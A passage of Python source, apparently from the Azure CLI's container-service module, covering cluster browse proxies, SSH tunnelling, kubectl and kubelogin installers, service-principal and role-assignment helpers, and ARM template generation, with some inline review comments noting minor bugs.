    Waits for a bit then opens a URL.  Useful for waiting for a proxy to come up, and then open the URL.
    """
    for _ in range(1, 10):
        try:
            urlopen(url, context=_ssl_context())
        except URLError:
            time.sleep(1)
        # NOTE(review): this break is unconditional, so the loop body runs at
        # most once (one probe, one optional 1s sleep) — confirm whether a
        # retry loop was intended.
        break
    webbrowser.open_new_tab(url)


def wait_then_open_async(url):
    """
    Spawns a thread that waits for a bit then opens a URL.
    """
    # NOTE(review): args=({url}) passes a one-element *set*, not a tuple;
    # Thread iterates it so the call still works — presumably (url,) was meant.
    t = threading.Thread(target=wait_then_open, args=({url}))
    t.daemon = True
    t.start()


def acs_browse(cmd, client, resource_group_name, name, disable_browser=False, ssh_key_file=None):
    """
    Opens a browser to the web interface for the cluster orchestrator

    :param name: Name of the target Azure container service instance.
    :type name: String
    :param resource_group_name: Name of Azure container service's resource group.
    :type resource_group_name: String
    :param disable_browser: If true, don't launch a web browser after estabilishing the proxy
    :type disable_browser: bool
    :param ssh_key_file: If set a path to an SSH key to use, only applies to DCOS
    :type ssh_key_file: string
    """
    acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
    _acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file)


def _acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file):
    # Dispatch to the orchestrator-specific browse implementation.
    orchestrator_type = acs_info.orchestrator_profile.orchestrator_type  # pylint: disable=no-member

    if str(orchestrator_type).lower() == 'kubernetes' or \
            orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or \
            (acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'):  # pylint: disable=no-member
        return k8s_browse(cmd, client, name, resource_group_name, disable_browser, ssh_key_file=ssh_key_file)
    if str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos:
        return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file)
    raise CLIError('Unsupported orchestrator type {} for browse'.format(orchestrator_type))


def k8s_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
    """
    Launch a proxy and browse the Kubernetes web UI.
    :param disable_browser: If true, don't launch a web browser after estabilishing the proxy
    :type disable_browser: bool
    """
    acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
    _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file)


def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file):
    """Fetch cluster credentials, then run `kubectl proxy` (blocking)."""
    if not which('kubectl'):
        raise CLIError('Can not find kubectl executable in PATH')
    browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml')
    # Start from a clean kubeconfig each time.
    if os.path.exists(browse_path):
        os.remove(browse_path)

    _k8s_get_credentials_internal(name, acs_info, browse_path, ssh_key_file, False)

    logger.warning('Proxy running on 127.0.0.1:8001/ui')
    logger.warning('Press CTRL+C to close the tunnel...')
    if not disable_browser:
        wait_then_open_async('http://127.0.0.1:8001/ui')
    subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"])


def dcos_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None):
    """
    Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser.

    :param name: name: Name of the target Azure container service instance.
    :type name: String
    :param resource_group_name: Name of Azure container service's resource group.
    :type resource_group_name: String
    :param disable_browser: If true, don't launch a web browser after estabilishing the proxy
    :type disable_browser: bool
    :param ssh_key_file: Path to the SSH key to use
    :type ssh_key_file: string
    """
    acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
    _dcos_browse_internal(acs_info, disable_browser, ssh_key_file)


def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file):
    """SSH to the cluster, start the octarine proxy, tunnel it locally."""
    if not os.path.isfile(ssh_key_file):
        raise CLIError('Private key file {} does not exist'.format(ssh_key_file))

    acs = acs_client.ACSClient()
    if not acs.connect(_get_host_name(acs_info), _get_username(acs_info),
                       key_filename=ssh_key_file):
        raise CLIError('Error connecting to ACS: {}'.format(_get_host_name(acs_info)))

    octarine_bin = '/opt/mesosphere/bin/octarine'
    if not acs.file_exists(octarine_bin):
        raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(octarine_bin))

    proxy_id = _rand_str(16)
    proxy_cmd = '{} {}'.format(octarine_bin, proxy_id)
    acs.run(proxy_cmd, background=True)

    # Parse the output to get the remote PORT
    proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id)
    stdout, _ = acs.run(proxy_client_cmd)
    remote_port = int(stdout.read().decode().strip())
    local_port = acs.get_available_local_port()

    # Set the proxy
    proxy.set_http_proxy('127.0.0.1', local_port)
    logger.warning('Proxy running on 127.0.0.1:%s', local_port)
    logger.warning('Press CTRL+C to close the tunnel...')
    if not disable_browser:
        wait_then_open_async('http://127.0.0.1')
    try:
        acs.create_tunnel(
            remote_host='127.0.0.1',
            remote_port=remote_port,
            local_port=local_port)
    finally:
        # Always undo the system proxy setting, even if the tunnel fails.
        proxy.disable_http_proxy()


def acs_install_cli(cmd, client, resource_group_name, name, install_location=None, client_version=None):
    """Install the CLI matching the cluster's orchestrator (kubectl or dcos)."""
    acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
    orchestrator_type = acs_info.orchestrator_profile.orchestrator_type  # pylint: disable=no-member
    kwargs = {'install_location': install_location}
    if client_version:
        kwargs['client_version'] = client_version
    if orchestrator_type == 'kubernetes':
        return k8s_install_cli(**kwargs)
    if orchestrator_type == 'dcos':
        return dcos_install_cli(**kwargs)
    raise CLIError('Unsupported orchestrator type {} for install-cli'.format(orchestrator_type))


def _ssl_context():
    """Return an SSL context; falls back for old Pythons / Windows Cloud Shell."""
    if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
        try:
            return ssl.SSLContext(ssl.PROTOCOL_TLS)  # added in python 2.7.13 and 3.6
        except AttributeError:
            return ssl.SSLContext(ssl.PROTOCOL_TLSv1)

    return ssl.create_default_context()


def _urlretrieve(url, filename):
    """Download `url` to `filename` using this module's SSL context."""
    req = urlopen(url, context=_ssl_context())
    with open(filename, "wb") as f:
        f.write(req.read())


def _unzip(src, dest):
    """Extract zip archive `src` into directory `dest`."""
    logger.debug('Extracting %s to %s.', src, dest)
    system = platform.system()
    if system in ('Linux', 'Darwin', 'Windows'):
        import zipfile
        with zipfile.ZipFile(src, 'r') as zipObj:
            zipObj.extractall(dest)
    else:
        raise CLIError('The current system is not supported.')


def dcos_install_cli(cmd, install_location=None, client_version='1.8'):
    """
    Downloads the dcos command line from Mesosphere
    """
    system = platform.system()

    if not install_location:
        raise CLIError(
            "No install location specified and it could not be determined from the current platform '{}'".format(
                system))
    base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}'
    if system == 'Windows':
        file_url = base_url.format('windows', client_version, 'dcos.exe')
    elif system == 'Linux':
        # TODO Support ARM CPU here
        file_url = base_url.format('linux', client_version, 'dcos')
    elif system == 'Darwin':
        file_url = base_url.format('darwin', client_version, 'dcos')
    else:
        # NOTE(review): this error message looks copy-pasted from the octarine
        # check and doesn't describe an unsupported platform — verify intent.
        raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system))

    logger.warning('Downloading client to %s', install_location)
    try:
        _urlretrieve(file_url, install_location)
        # Mark the downloaded binary executable for user/group/other.
        os.chmod(install_location,
                 os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    except IOError as err:
        raise CLIError('Connection error while attempting to download client ({})'.format(err))


def k8s_install_cli(cmd, client_version='latest', install_location=None, base_src_url=None,
                    kubelogin_version='latest', kubelogin_install_location=None,
                    kubelogin_base_src_url=None):
    """Install both kubectl and kubelogin."""
    k8s_install_kubectl(cmd, client_version, install_location, base_src_url)
    k8s_install_kubelogin(cmd, kubelogin_version, kubelogin_install_location, kubelogin_base_src_url)


def k8s_install_kubectl(cmd, client_version='latest', install_location=None, source_url=None):
    """
    Install kubectl, a command-line interface for Kubernetes clusters.
    """

    if not source_url:
        source_url = "https://storage.googleapis.com/kubernetes-release/release"
        cloud_name = cmd.cli_ctx.cloud.name
        # Use the Azure China mirror when running against that cloud.
        if cloud_name.lower() == 'azurechinacloud':
            source_url = 'https://mirror.azure.cn/kubernetes/kubectl'

    if client_version == 'latest':
        context = _ssl_context()
        version = urlopen(source_url + '/stable.txt', context=context).read()
        client_version = version.decode('UTF-8').strip()
    else:
        client_version = "v%s" % client_version

    file_url = ''
    system = platform.system()
    base_url = source_url + '/{}/bin/{}/amd64/{}'

    # ensure installation directory exists
    install_dir, cli = os.path.dirname(install_location), os.path.basename(install_location)
    if not os.path.exists(install_dir):
        os.makedirs(install_dir)

    if system == 'Windows':
        file_url = base_url.format(client_version, 'windows', 'kubectl.exe')
    elif system == 'Linux':
        # TODO: Support ARM CPU here
        file_url = base_url.format(client_version, 'linux', 'kubectl')
    elif system == 'Darwin':
        file_url = base_url.format(client_version, 'darwin', 'kubectl')
    else:
        # NOTE(review): same copy-pasted error text as dcos_install_cli.
        raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system))

    logger.warning('Downloading client to "%s" from "%s"', install_location, file_url)
    try:
        _urlretrieve(file_url, install_location)
        os.chmod(install_location,
                 os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    except IOError as ex:
        raise CLIError('Connection error while attempting to download client ({})'.format(ex))

    if system == 'Windows':
        # be verbose, as the install_location likely not in Windows's search PATHs
        env_paths = os.environ['PATH'].split(';')
        found = next((x for x in env_paths if x.lower().rstrip('\\') == install_dir.lower()), None)
        if not found:
            # pylint: disable=logging-format-interpolation
            logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n'
                           ' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. '
                           'This is good for the current command session.\n'
                           ' 2. Update system PATH environment variable by following '
                           '"Control Panel->System->Advanced->Environment Variables", and re-open the command window. '
                           'You only need to do it once'.format(install_dir, cli))
        else:
            logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.',
                           install_dir, cli)


def k8s_install_kubelogin(cmd, client_version='latest', install_location=None, source_url=None):
    """
    Install kubelogin, a client-go credential (exec) plugin implementing azure authentication.
""" cloud_name = cmd.cli_ctx.cloud.name if not source_url: source_url = 'https://github.com/Azure/kubelogin/releases/download' if cloud_name.lower() == 'azurechinacloud': source_url = 'https://mirror.azure.cn/kubernetes/kubelogin' if client_version == 'latest': context = _ssl_context() latest_release_url = 'https://api.github.com/repos/Azure/kubelogin/releases/latest' if cloud_name.lower() == 'azurechinacloud': latest_release_url = 'https://mirror.azure.cn/kubernetes/kubelogin/latest' latest_release = urlopen(latest_release_url, context=context).read() client_version = json.loads(latest_release)['tag_name'].strip() else: client_version = "v%s" % client_version base_url = source_url + '/{}/kubelogin.zip' file_url = base_url.format(client_version) # ensure installation directory exists install_dir, cli = os.path.dirname(install_location), os.path.basename(install_location) if not os.path.exists(install_dir): os.makedirs(install_dir) system = platform.system() if system == 'Windows': sub_dir, binary_name = 'windows_amd64', 'kubelogin.exe' elif system == 'Linux': # TODO: Support ARM CPU here sub_dir, binary_name = 'linux_amd64', 'kubelogin' elif system == 'Darwin': sub_dir, binary_name = 'darwin_amd64', 'kubelogin' else: raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system)) with tempfile.TemporaryDirectory() as tmp_dir: try: download_path = os.path.join(tmp_dir, 'kubelogin.zip') logger.warning('Downloading client to "%s" from "%s"', download_path, file_url) _urlretrieve(file_url, download_path) except IOError as ex: raise CLIError('Connection error while attempting to download client ({})'.format(ex)) _unzip(download_path, tmp_dir) download_path = os.path.join(tmp_dir, 'bin', sub_dir, binary_name) shutil.move(download_path, install_location) os.chmod(install_location, os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH) if system == 'Windows': # be verbose, as the install_location likely not in Windows's search 
PATHs env_paths = os.environ['PATH'].split(';') found = next((x for x in env_paths if x.lower().rstrip('\\') == install_dir.lower()), None) if not found: # pylint: disable=logging-format-interpolation logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n' ' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. ' 'This is good for the current command session.\n' ' 2. Update system PATH environment variable by following ' '"Control Panel->System->Advanced->Environment Variables", and re-open the command window. ' 'You only need to do it once'.format(install_dir, cli)) else: logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.', install_dir, cli) def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret): # use get_progress_controller hook = cli_ctx.get_progress_controller(True) hook.add(messsage='Creating service principal', value=0, total_val=1.0) logger.info('Creating service principal') # always create application with 5 years expiration start_date = datetime.datetime.utcnow() end_date = start_date + relativedelta(years=5) result, aad_session_key = create_application(rbac_client.applications, name, url, [url], password=client_secret, start_date=start_date, end_date=end_date) service_principal = result.app_id # pylint: disable=no-member for x in range(0, 10): hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0) try: create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client) break # TODO figure out what exception AAD throws here sometimes. 
        except Exception as ex:  # pylint: disable=broad-except
            logger.info(ex)
            # Back off progressively between retries (AAD propagation delay).
            time.sleep(2 + 2 * x)
    else:
        # All retries exhausted without success.
        return False, aad_session_key
    hook.add(message='Finished service principal creation', value=1.0, total_val=1.0)
    logger.info('Finished service principal creation')
    return service_principal, aad_session_key


def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
    """Create a role assignment, retrying to ride out AAD propagation lag.

    Returns True on success (or if the assignment already exists), False
    when all retries fail.
    """
    # AAD can have delays in propagating data, so sleep and retry
    hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0)
    logger.info('Waiting for AAD role to propagate')
    for x in range(0, 10):
        hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0)
        try:
            # TODO: break this out into a shared utility library
            create_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope)
            break
        except CloudError as ex:
            if ex.message == 'The role assignment already exists.':
                break
            logger.info(ex.message)
        except:  # pylint: disable=bare-except
            pass
        time.sleep(delay + delay * x)
    else:
        return False
    hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
    logger.info('AAD role propagation done')
    return True


def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
                            scope=None, include_inherited=False, yes=None):
    """Delete role assignments by id, or by assignee/role/scope filters.

    With no filters at all, prompts before deleting every assignment in
    the subscription.
    """
    factory = get_auth_management_client(cli_ctx, scope)
    assignments_client = factory.role_assignments
    definitions_client = factory.role_definitions
    ids = ids or []
    if ids:
        if assignee or role or resource_group_name or scope or include_inherited:
            raise CLIError('When assignment ids are used, other parameter values are not required')
        for i in ids:
            assignments_client.delete_by_id(i)
        return
    # NOTE(review): `assignee` appears twice in this any([...]) list —
    # harmless duplication, but presumably one entry was meant to be
    # something else; verify.
    if not any([ids, assignee, role, resource_group_name, scope, assignee, yes]):
        msg = 'This will delete all role assignments under the subscription. Are you sure?'
        if not prompt_y_n(msg, default="n"):
            return

    scope = _build_role_scope(resource_group_name, scope,
                              assignments_client.config.subscription_id)
    assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
                                           scope, assignee, role, include_inherited,
                                           include_groups=False)

    if assignments:
        for a in assignments:
            assignments_client.delete_by_id(a.id)


def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
    """Delete a role assignment, retrying to ride out AAD propagation lag.

    Returns True on success, False when all retries fail; CLIError is
    re-raised immediately.
    """
    # AAD can have delays in propagating data, so sleep and retry
    hook = cli_ctx.get_progress_controller(True)
    hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
    logger.info('Waiting for AAD role to delete')
    for x in range(0, 10):
        hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
        try:
            delete_role_assignments(cli_ctx, role=role, assignee=service_principal, scope=scope)
            break
        except CLIError as ex:
            raise ex
        except CloudError as ex:
            logger.info(ex)
        time.sleep(delay + delay * x)
    else:
        return False
    hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
    logger.info('AAD role deletion done')
    return True


def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
                             scope, assignee, role, include_inherited, include_groups):
    """List role assignments filtered by scope, assignee, and/or role."""
    assignee_object_id = None
    if assignee:
        assignee_object_id = _resolve_object_id(cli_ctx, assignee)

    # always use "scope" if provided, so we can get assignments beyond
    # subscription e.g. management groups
    if scope:
        assignments = list(assignments_client.list_for_scope(
            scope=scope, filter='atScope()'))
    elif assignee_object_id:
        if include_groups:
            f = "assignedTo('{}')".format(assignee_object_id)
        else:
            f = "principalId eq '{}'".format(assignee_object_id)
        assignments = list(assignments_client.list(filter=f))
    else:
        assignments = list(assignments_client.list())

    if assignments:
        # NOTE(review): re.match treats each assignment's scope string as a
        # regex pattern against `scope` — confirm this prefix-match behavior
        # is intended for the include_inherited case.
        assignments = [a for a in assignments if (
            not scope or
            include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
            _get_role_property(a, 'scope').lower() == scope.lower()
        )]

        if role:
            role_id = _resolve_role_id(role, scope, definitions_client)
            assignments = [i for i in assignments if _get_role_property(
                i, 'role_definition_id') == role_id]

        if assignee_object_id:
            assignments = [i for i in assignments if _get_role_property(
                i, 'principal_id') == assignee_object_id]

    return assignments


def _get_role_property(obj, property_name):
    """Read `property_name` from a dict or an object attribute uniformly."""
    if isinstance(obj, dict):
        return obj[property_name]
    return getattr(obj, property_name)


def _get_default_dns_prefix(name, resource_group_name, subscription_id):
    """Derive a DNS prefix from cluster name, resource group, and sub id."""
    # Use subscription id to provide uniqueness and prevent DNS name clashes
    name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
    if not name_part[0].isalpha():
        # DNS labels must start with a letter; prepend 'a' if needed.
        name_part = (str('a') + name_part)[0:10]
    resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16]
    return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])


def list_acs_locations(cmd, client):
    """Return the production and preview regions where ACS is available."""
    return {
        "productionRegions": regions_in_prod,
        "previewRegions": regions_in_preview
    }


def _generate_windows_profile(windows, admin_username, admin_password):
    """Build the windowsProfile dict, or None when `windows` is falsy."""
    if windows:
        if not admin_password:
            raise CLIError('--admin-password is required.')
        if len(admin_password) < 6:
            raise CLIError('--admin-password must be at least 6 characters')
        windows_profile = {
            "adminUsername": admin_username,
            "adminPassword": admin_password,
        }
        return windows_profile
    return None


def _generate_master_pool_profile(api_version,
                                 master_profile, master_count, dns_name_prefix,
                                 master_vm_size, master_osdisk_size, master_vnet_subnet_id,
                                 master_first_consecutive_static_ip, master_storage_profile):
    """Build the masterProfile dict, overlaying user-supplied values on defaults."""
    master_pool_profile = {}
    default_master_pool_profile = {
        "count": int(master_count),
        "dnsPrefix": dns_name_prefix + 'mgmt',
    }
    # The 2017-07-01 API accepts additional master settings.
    if api_version == "2017-07-01":
        default_master_pool_profile = _update_dict(default_master_pool_profile, {
            "count": int(master_count),
            "dnsPrefix": dns_name_prefix + 'mgmt',
            "vmSize": master_vm_size,
            "osDiskSizeGB": int(master_osdisk_size),
            "vnetSubnetID": master_vnet_subnet_id,
            "firstConsecutiveStaticIP": master_first_consecutive_static_ip,
            "storageProfile": master_storage_profile,
        })
    if not master_profile:
        master_pool_profile = default_master_pool_profile
    else:
        master_pool_profile = _update_dict(default_master_pool_profile, master_profile)
    return master_pool_profile


def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
                                  agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
                                  agent_ports, agent_storage_profile):
    """Build the agentPoolProfiles list, overlaying user profiles on defaults."""
    agent_pool_profiles = []
    default_agent_pool_profile = {
        "count": int(agent_count),
        "vmSize": agent_vm_size,
        "osType": os_type,
        "dnsPrefix": dns_name_prefix + 'agent',
    }
    # The 2017-07-01 API accepts additional agent-pool settings.
    if api_version == "2017-07-01":
        default_agent_pool_profile = _update_dict(default_agent_pool_profile, {
            "count": int(agent_count),
            "vmSize": agent_vm_size,
            "osDiskSizeGB": int(agent_osdisk_size),
            "osType": os_type,
            "dnsPrefix": dns_name_prefix + 'agent',
            "vnetSubnetID": agent_vnet_subnet_id,
            "ports": agent_ports,
            "storageProfile": agent_storage_profile,
        })
    if agent_profiles is None:
        agent_pool_profiles.append(_update_dict(default_agent_pool_profile, {"name": "agentpool0"}))
    else:
        # override agentPoolProfiles by using the passed in agent_profiles
        for idx, ap in enumerate(agent_profiles):
            # if the user specified dnsPrefix, we honor that
            # otherwise, we use the idx to avoid duplicate dns name
            a = _update_dict({"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap)
            agent_pool_profiles.append(_update_dict(default_agent_pool_profile, a))

    return agent_pool_profiles


def _generate_outputs(name, orchestrator_type, admin_username):
    """Build ARM template outputs (FQDNs and ssh command strings)."""
    # define outputs
    outputs = {
        "masterFQDN": {
            "type": "string",
            "value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name)  # pylint: disable=line-too-long
        },
        "sshMaster0": {
            "type": "string",
            "value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name)  # pylint: disable=line-too-long
        },
    }
    if orchestrator_type.lower() != "kubernetes":
        outputs["agentFQDN"] = {
            "type": "string",
            "value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name)  # pylint: disable=line-too-long
        }
        # override sshMaster0 for non-kubernetes scenarios
        outputs["sshMaster0"] = {
            "type": "string",
            "value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name)  # pylint: disable=line-too-long
        }
    return outputs


def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
                         agent_pool_profiles, ssh_key_value, admin_username, windows_profile):
    """Assemble the container-service resource properties payload."""
    properties = {
        "orchestratorProfile": {
            "orchestratorType": orchestrator_type,
        },
        "masterProfile": master_pool_profile,
        "agentPoolProfiles": agent_pool_profiles,
        "linuxProfile": {
            "ssh": {
                "publicKeys": [
                    {
                        "keyData": ssh_key_value
                    }
                ]
            },
            "adminUsername": admin_username
        },
    }
    if api_version == "2017-07-01":
        properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version

    if windows_profile is not None:
        properties["windowsProfile"] = windows_profile
    return properties


def _get_user_assigned_identity_client_id(cli_ctx, resource_id):
    """Resolve a user-assigned identity resource id to its client id.

    Raises ResourceNotFoundError if the identity does not exist,
    ClientRequestError for other service errors, and
    InvalidArgumentValueError if the resource id cannot be parsed.
    """
    msi_client = get_msi_client(cli_ctx)
    pattern = '/subscriptions/.*?/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)'
    # Resource ids are compared case-insensitively.
    resource_id = resource_id.lower()
    match = re.search(pattern, resource_id)
    if match:
        resource_group_name = match.group(1)
        identity_name = match.group(2)
        try:
            identity = msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
                                                               resource_name=identity_name)
        except CloudError as ex:
            if 'was not found' in ex.message:
                raise ResourceNotFoundError("Identity {} not found.".format(resource_id))
            raise ClientRequestError(ex.message)
        return identity.client_id
    raise InvalidArgumentValueError("Cannot parse identity name from provided resource id {}.".format(resource_id))


# pylint: disable=too-many-locals
def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None,
               location=None, admin_username="azureuser", api_version=None, master_profile=None,
               master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="",
               master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="",
               agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0,
               agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="",
               orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None,
               tags=None, windows=False, admin_password="", generate_ssh_keys=False,  # pylint: disable=unused-argument
               validate=False, no_wait=False):
    """Create a new Acs.
    :param resource_group_name: The name of the resource group. The name is case insensitive.
    :type resource_group_name: str
    :param deployment_name: The name of the deployment.
    :type deployment_name: str
    :param dns_name_prefix: Sets the Domain name prefix for the cluster. The concatenation of
     the domain name and the regionalized DNS zone make up the fully qualified domain name
     associated with the public IP address.
    :type dns_name_prefix: str
    :param name: Resource name for the container service.
:type name: str :param ssh_key_value: Configure all linux machines with the SSH RSA public key string. Your key should include three parts, for example 'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm :type ssh_key_value: str :param content_version: If included it must match the ContentVersion in the template. :type content_version: str :param admin_username: User name for the Linux Virtual Machines. :type admin_username: str :param api_version: ACS API version to use :type api_version: str :param master_profile: MasterProfile used to describe master pool :type master_profile: dict :param master_vm_size: The size of master pool Virtual Machine :type master_vm_size: str :param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine :type master_osdisk_size: int :param master_count: The number of masters for the cluster. :type master_count: int :param master_vnet_subnet_id: The vnet subnet id for master pool :type master_vnet_subnet_id: str :param master_storage_profile: The storage profile used for master pool. Possible value could be StorageAccount, ManagedDisk. :type master_storage_profile: str :param agent_profiles: AgentPoolProfiles used to describe agent pools :type agent_profiles: dict :param agent_vm_size: The size of the Virtual Machine. :type agent_vm_size: str :param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine :type agent_osdisk_size: int :param agent_vnet_subnet_id: The vnet subnet id for master pool :type agent_vnet_subnet_id: str :param agent_ports: the ports exposed on the agent pool :type agent_ports: list :param agent_storage_profile: The storage profile used for agent pool. Possible value could be StorageAccount, ManagedDisk. :type agent_storage_profile: str :param location: Location for VM resources. :type location: str :param orchestrator_type: The type of orchestrator used to manage the applications on the cluster. 
:type orchestrator_type: str or :class:`orchestratorType <Default.models.orchestratorType>` :param tags: Tags object. :type tags: object :param windows: If true, the cluster will be built for running Windows container. :type windows: bool :param admin_password: The adminstration password for Windows nodes. Only available if --windows=true :type admin_password: str :param bool raw: returns the direct response alongside the deserialized response :rtype: :class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>` instance that returns :class:`DeploymentExtended <Default.models.DeploymentExtended>` :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>` if raw=true :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>` """ if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value): raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value)) subscription_id = get_subscription_id(cmd.cli_ctx) if not dns_name_prefix: dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id) rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name) if location is None: location = rg_location # if api-version is not specified, or specified in a version not supported # override based on location if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]: if location in regions_in_preview: api_version = "2017-07-01" # 2017-07-01 supported in the preview locations else: api_version = "2017-01-31" # 2017-01-31 applied to other locations if orchestrator_type.lower() == 'kubernetes': principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id, dns_name_prefix, location, name) client_secret = principal_obj.get("client_secret") service_principal = principal_obj.get("service_principal") elif windows: raise CLIError('--windows is only supported for Kubernetes clusters') # set location if void if not location: 
location = '[resourceGroup().location]' # set os_type os_type = 'Linux' if windows: os_type = 'Windows' # set agent_ports if void if not agent_ports: agent_ports = [] # get windows_profile windows_profile = _generate_windows_profile(windows, admin_username, admin_password) # The resources.properties fields should match with ContainerServices' api model master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix, master_vm_size, master_osdisk_size, master_vnet_subnet_id, master_first_consecutive_static_ip, master_storage_profile) agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix, agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id, agent_ports, agent_storage_profile) outputs = _generate_outputs(name, orchestrator_type, admin_username) properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile, agent_pool_profiles, ssh_key_value, admin_username, windows_profile) resource = { "apiVersion": api_version, "location": location, "type": "Microsoft.ContainerService/containerServices", "name": name, "tags": tags, "properties": properties, } template = { "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", "contentVersion": "1.0.0.0", "resources": [ resource, ], "outputs": outputs, } params = {} if service_principal is not None and client_secret is not None: properties["servicePrincipalProfile"] = { "clientId": service_principal, "secret": "[parameters('clientSecret')]", } template["parameters"] = { "clientSecret": { "type": "secureString", "metadata": { "description": "The client secret for the service principal" } } } params = { "clientSecret": { "value": client_secret } } # Due to SPN replication latency, we do a few retries here max_retry = 30 retry_exception = Exception(None) for _ in range(0, max_retry): try: return _invoke_deployment(cmd, resource_group_name, 
deployment_name, template, params, validate, no_wait)
        except CloudError as ex:
            retry_exception = ex
            # These error messages indicate AAD replication delay for the
            # freshly created service principal; back off and retry.
            if 'is not valid according to the validation procedure' in ex.message or \
                    'The credentials in ServicePrincipalProfile were invalid' in ex.message or \
                    'not found in Active Directory tenant' in ex.message:
                time.sleep(3)
            else:
                raise ex
    raise retry_exception


def store_acs_service_principal(subscription_id, client_secret, service_principal,
                                file_name='acsServicePrincipal.json'):
    # Persist (or refresh) the service-principal credentials for this
